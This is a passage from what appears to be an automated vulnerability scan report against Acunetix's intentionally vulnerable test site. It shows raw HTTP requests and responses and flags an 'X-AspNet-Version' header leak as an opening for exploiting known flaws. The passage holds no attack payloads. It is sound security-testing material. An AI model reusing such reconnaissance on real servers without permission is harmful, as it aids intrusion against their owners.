4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/sNcuYAa/cRqMvUgVyEWyccHwUIA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:35:22 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix                            Web Vulnerability Scanner 2 </strong></p>                           <p>21 July 2005 - <strong>Start-up company Acunetix released                            Acunetix Web Vulnerability Scanner: a tool to automatically                            audit website security. Acunetix Web Vulnerability Scanner                            2 crawls an entire website, launches popular web attacks                            (SQL Injection etc.) and identifies vulnerabilities                            that need to be fixed.</strong> </p>                           <p><strong>Securing your website should be your number one                            concern</strong><br />                           Hackers are concentrating their efforts on web-based                            applications - 75% of cyber attacks are done at the                            web application level, a Gartner Group study has revealed.                            Web applications are accessible 24 hours a day, 7 days                            a week and control valuable data such as customer information,                            transaction information and even proprietary corporate                            data.</p>                           <p><strong>500,000 customer credit card numbers obtained via                            a web attack</strong><br />                           Well-known sites that were open to web application attacks                            include fashion label Guess and pet supply retailer                            PetCo.com who were notoriously found to be vulnerable                            to the SQL injection vulnerability (June 2003). This                            resulted in PetCo leaving as many as 500,000 credit                            card numbers open to anyone able to construct this specially-crafted                            URL.</p>                           <p><strong>Firewalls, SSL and locked-down servers are futile                            against web application hacking</strong><br />                           Any defense at network security level will provide no                            protection against web application attacks since they                            are launched on port 80 - which has to remain open.                            In addition, web applications (customer areas, shopping                            carts etc.) are often tailor-made, invariably tested                            less than off-the-shelf software and are therefore more                            susceptible to attack.</p>                           <p>&quot;Companies have implemented network-level security,                            however they fail to audit and secure their web applications.                            These applications have access to sensitive data and                            are a hacker's prime target,&quot; said Nick Galea,                            CEO of Acunetix. &quot;Auditing one's web apps should                            be the number one security concern.&quot;</p>                           <p><strong>The need for an automated web application vulnerability                            scanner</strong><br />                           Manually auditing a web application for vulnerabilities                            to SQL injection, cross site scripting and other web                            attacks is virtually impossible. With Acunetix Web Vulnerability                            Scanner the process of auditing web applications such                            as shopping carts and forms, can be easily automated.                            What's more, the security checks can easily be re-launched                            for each application update.</p>                           <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br />                           Acunetix WVS first crawls the whole website, analyzes                            in-depth each file it finds, and displays the entire                            website structure. After this discovery stage, it performs                            an automatic audit for common security vulnerabilities.</p>                           <p><strong>Automatically detects SQL injection, cross site                            scripting and other web vulnerabilities</strong><br />                           SQL injection is a hacking technique which modifies                            SQL commands in order to gain access to data in the                            database. Cross site scripting attacks allow a hacker                            to execute a malicious script on your visitors' browser.                            Acunetix Web Vulnerability Scanner can check if your                            web application is vulnerable to both of these attacks.                            More information about cross site scripting &amp; SQL                            injection at our website security info page.</p>                           <p><strong>Acunetix Web Vulnerability Scanner also checks for                            the following web attacks:</strong></p>                           <ul> <li>CRLF injection attacks<br />                           </li><li>Code execution attacks<br />                           </li><li>Directory traversal attacks<br />                           </li><li>File inclusion attacks<br />                           </li><li> Input validation attacks<br />                           </li><li>Authentication attacks.</li> </ul>                           <p><strong>Advanced penetration testing tools</strong><br />                           Acunetix WVS also includes tools such as an HTTP editor                            &amp; HTTP sniffer to allow customization of web vulnerability                            checks. Using the Vulnerability editor, new attacks                            can easily be created.</p>                           <p><strong>Pricing &amp; availability</strong><br />                           Acunetix WVS is available as an enterprise or as a consultant                            version. A subscription based license can be purchased                            for as little as $395, whereas a perpetual license starts                            at $2995. For more information visit our pricing page.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          2.0.50727
          Solution

          Configure the server so it will not return those headers.

        25. POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Alert tags
          Alert description

          Server leaks information via "X-AspNet-Version"/"X-AspNetMvc-Version" HTTP response header field(s).

          Other info

          An attacker can use this information to exploit known vulnerabilities.

          Request
          Request line and header section (413 bytes)
          POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Content-Type: application/x-www-form-urlencoded
          Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
          Content-Length: 3745
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (3745 bytes)
          __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgK746uPDALtiZ78CwKo4Jb%2FDwKo4Jb%2FDwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc%2BsAwLmnc%2BsAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb%2FQBgLmnb%2FQBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk%2FAvukuT8C%2B6St0gkC%2B6St0gkC%2B6TB9gIC%2B6TB9gIC%2B6T1jQoC%2B6T1jQoC%2B6TpoAMC%2B6TpoAMC%2B6SdxwwC%2B6SdxwwC%2B6TxrAkC%2B6TxrAkC%2B6TlwwIC%2B6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz%2BQ8C3Muz%2BQ9jwc%2FcRnTJwdNTwN8SPSTaigKqpw%3D%3D
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:21 GMT
          Content-Length: 17859
          
          
          Response body (17859 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlY